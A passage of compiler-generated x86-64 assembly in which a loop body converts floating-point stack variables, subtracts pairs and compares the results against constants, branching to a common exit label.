movsd LCPI1_0(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_293
jp LBB1_293
jmp LBB1_295
LBB1_293: ## in Loop: Header=BB1_8 Depth=1
movss -192(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -116(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_9(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_294
jp LBB1_294
jmp LBB1_295
LBB1_294: ## in Loop: Header=BB1_8 Depth=1
movss -120(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -116(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_6(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jne LBB1_454
jp LBB1_454
LBB1_295: ## in Loop: Header=BB1_8 Depth=1
movss -176(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -172(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_4(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.296: ## in Loop: Header=BB1_8 Depth=1
movss -40(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -172(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_14(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.297: ## in Loop: Header=BB1_8 Depth=1
movss -168(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -172(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_10(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.298: ## in Loop: Header=BB1_8 Depth=1
movss -112(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -172(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_7(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.299: ## in Loop: Header=BB1_8 Depth=1
movss -128(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -172(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_13(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.300: ## in Loop: Header=BB1_8 Depth=1
movss -72(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -172(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_13(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.301: ## in Loop: Header=BB1_8 Depth=1
movss -192(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -172(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_6(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.302: ## in Loop: Header=BB1_8 Depth=1
movss -88(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -172(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_4(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.303: ## in Loop: Header=BB1_8 Depth=1
movss -96(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -172(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_1(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.304: ## in Loop: Header=BB1_8 Depth=1
movss -104(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -172(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_15(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.305: ## in Loop: Header=BB1_8 Depth=1
movss -176(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -172(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_4(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_306
jp LBB1_306
jmp LBB1_315
LBB1_306: ## in Loop: Header=BB1_8 Depth=1
movss -40(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -172(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_14(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_307
jp LBB1_307
jmp LBB1_315
LBB1_307: ## in Loop: Header=BB1_8 Depth=1
movss -168(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -172(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_10(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_308
jp LBB1_308
jmp LBB1_315
LBB1_308: ## in Loop: Header=BB1_8 Depth=1
movss -112(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -172(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_7(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_309
jp LBB1_309
jmp LBB1_315
LBB1_309: ## in Loop: Header=BB1_8 Depth=1
movss -128(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -172(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_13(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_310
jp LBB1_310
jmp LBB1_315
LBB1_310: ## in Loop: Header=BB1_8 Depth=1
movss -72(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -172(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_13(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_311
jp LBB1_311
jmp LBB1_315
LBB1_311: ## in Loop: Header=BB1_8 Depth=1
movss -192(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -172(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_6(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_312
jp LBB1_312
jmp LBB1_315
LBB1_312: ## in Loop: Header=BB1_8 Depth=1
movss -88(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -172(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_4(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_313
jp LBB1_313
jmp LBB1_315
LBB1_313: ## in Loop: Header=BB1_8 Depth=1
movss -96(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -172(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_1(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_314
jp LBB1_314
jmp LBB1_315
LBB1_314: ## in Loop: Header=BB1_8 Depth=1
movss -104(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -172(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_15(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jne LBB1_454
jp LBB1_454
LBB1_315: ## in Loop: Header=BB1_8 Depth=1
movss -176(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -68(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_14(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.316: ## in Loop: Header=BB1_8 Depth=1
movss -32(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -68(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_14(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.317: ## in Loop: Header=BB1_8 Depth=1
movss -168(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -68(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_3(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.318: ## in Loop: Header=BB1_8 Depth=1
movss -112(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -68(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_6(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.319: ## in Loop: Header=BB1_8 Depth=1
movss -152(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -68(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_10(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.320: ## in Loop: Header=BB1_8 Depth=1
movss -160(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -68(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_19(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.321: ## in Loop: Header=BB1_8 Depth=1
movss -136(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -68(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_11(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.322: ## in Loop: Header=BB1_8 Depth=1
movss -72(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -68(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_17(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.323: ## in Loop: Header=BB1_8 Depth=1
movss -104(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -68(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_12(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.324: ## in Loop: Header=BB1_8 Depth=1
movss -88(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -68(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_11(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.325: ## in Loop: Header=BB1_8 Depth=1
movss -176(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -68(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_14(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_326
jp LBB1_326
jmp LBB1_335
LBB1_326: ## in Loop: Header=BB1_8 Depth=1
movss -32(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -68(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_14(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_327
jp LBB1_327
jmp LBB1_335
LBB1_327: ## in Loop: Header=BB1_8 Depth=1
movss -168(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -68(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_3(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_328
jp LBB1_328
jmp LBB1_335
LBB1_328: ## in Loop: Header=BB1_8 Depth=1
movss -112(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -68(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_6(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_329
jp LBB1_329
jmp LBB1_335
LBB1_329: ## in Loop: Header=BB1_8 Depth=1
movss -152(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -68(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_10(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_330
jp LBB1_330
jmp LBB1_335
LBB1_330: ## in Loop: Header=BB1_8 Depth=1
movss -160(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -68(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_19(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_331
jp LBB1_331
jmp LBB1_335
LBB1_331: ## in Loop: Header=BB1_8 Depth=1
movss -136(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -68(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_11(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_332
jp LBB1_332
jmp LBB1_335
LBB1_332: ## in Loop: Header=BB1_8 Depth=1
movss -72(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -68(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_17(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_333
jp LBB1_333
jmp LBB1_335
LBB1_333: ## in Loop: Header=BB1_8 Depth=1
movss -104(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -68(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_12(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_334
jp LBB1_334
jmp LBB1_335
LBB1_334: ## in Loop: Header=BB1_8 Depth=1
movss -88(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -68(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_11(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jne LBB1_454
jp LBB1_454
LBB1_335: ## in Loop: Header=BB1_8 Depth=1
movss -176(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -36(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_7(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.336: ## in Loop: Header=BB1_8 Depth=1
movss -184(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -36(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_14(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.337: ## in Loop: Header=BB1_8 Depth=1
movss -40(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -36(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_16(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.338: ## in Loop: Header=BB1_8 Depth=1
movss -64(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -36(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_19(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.339: ## in Loop: Header=BB1_8 Depth=1
movss -168(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -36(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_10(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.340: ## in Loop: Header=BB1_8 Depth=1
movss -152(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -36(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_18(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.341: ## in Loop: Header=BB1_8 Depth=1
movss -56(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -36(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_12(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.342: ## in Loop: Header=BB1_8 Depth=1
movss -128(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -36(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_14(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.343: ## in Loop: Header=BB1_8 Depth=1
movss -104(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -36(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_16(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.344: ## in Loop: Header=BB1_8 Depth=1
movss -120(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm1
movss -36(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
subsd %xmm0, %xmm1
xorl %eax, %eax
## kill: def $al killed $al killed $eax
movsd LCPI1_2(%rip), %xmm0 ## xmm0 = mem[0],zero
ucomisd %xmm1, %xmm0
movb %al, -207(%rbp) ## 1-byte Spill
jb LBB1_454
## %bb.345: ## in Loop: Header=BB1_8 Depth=1
movss -176(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -36(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_7(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_346
jp LBB1_346
jmp LBB1_355
LBB1_346: ## in Loop: Header=BB1_8 Depth=1
movss -184(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -36(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_14(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_347
jp LBB1_347
jmp LBB1_355
LBB1_347: ## in Loop: Header=BB1_8 Depth=1
movss -40(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -36(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_16(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_348
jp LBB1_348
jmp LBB1_355
LBB1_348: ## in Loop: Header=BB1_8 Depth=1
movss -64(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -36(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_19(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_349
jp LBB1_349
jmp LBB1_355
LBB1_349: ## in Loop: Header=BB1_8 Depth=1
movss -168(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
movss -36(%rbp), %xmm1 ## xmm1 = mem[0],zero,zero,zero
cvtss2sd %xmm1, %xmm1
subsd %xmm1, %xmm0
movsd LCPI1_10(%rip), %xmm1 ## xmm1 = mem[0],zero
ucomisd %xmm1, %xmm0
jne LBB1_350
jp LBB1_350
jmp LBB1_355
LBB1_350: ## in Loop: Header=BB1_8 Depth=1
movss -152(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero
cvtss2sd %xmm0, %xmm0
